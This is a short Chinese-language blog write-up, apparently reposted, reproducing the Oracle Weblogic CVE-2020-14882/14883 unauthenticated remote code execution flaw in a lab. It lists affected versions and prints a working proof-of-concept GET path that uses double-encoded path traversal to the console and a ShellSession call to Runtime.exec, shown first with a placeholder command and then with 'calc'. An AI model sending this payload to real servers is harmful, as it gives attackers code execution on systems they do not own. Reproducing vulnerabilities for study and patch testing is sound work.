(CVE-2020-14882​&14883)Weblogic RCE复现

0x01 简介

Weblogic是美国Oracle公司出品的一个Application Server,确切的说是一个基于JavaEE架构的中间件,Weblogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。

0x02 漏洞描述

未经身份验证的远程攻击者可能通过构造特殊的GET请求,利用该漏洞在受影响的 Weblogic Server上执行任意代码。

影响版本

  • weblogic 10.3.6.0.0
  • weblogic 12.1.3.0.0
  • weblogic 12.2.1.3.0
  • weblogic 12.2.1.4.0
  • weblogic 14.1.1.0.0

0x03 环境搭建

请参考https://www.cnblogs.com/KHZ521/p/14053395.html

0x04 漏洞复现

POC:

/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27执行的命令%27);%22);

1.查看服务器weblogic的版本 (这里用的是CVE-2020-14645weblogic漏洞探测工具)https://github.com/DSO-Lab/defvul

2.随便请求并抓包

3.使用poc进行测试

/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc%27);%22);


4.复现成功

0x05 结束语

这个地方有点小问题,测试poc的时候相应包的响应结果很慢,并且服务器端打开了十几个窗口,我也不知道是为啥,反正复现成功了

原文地址:https://www.cnblogs.com/KHZ521/p/14135902.html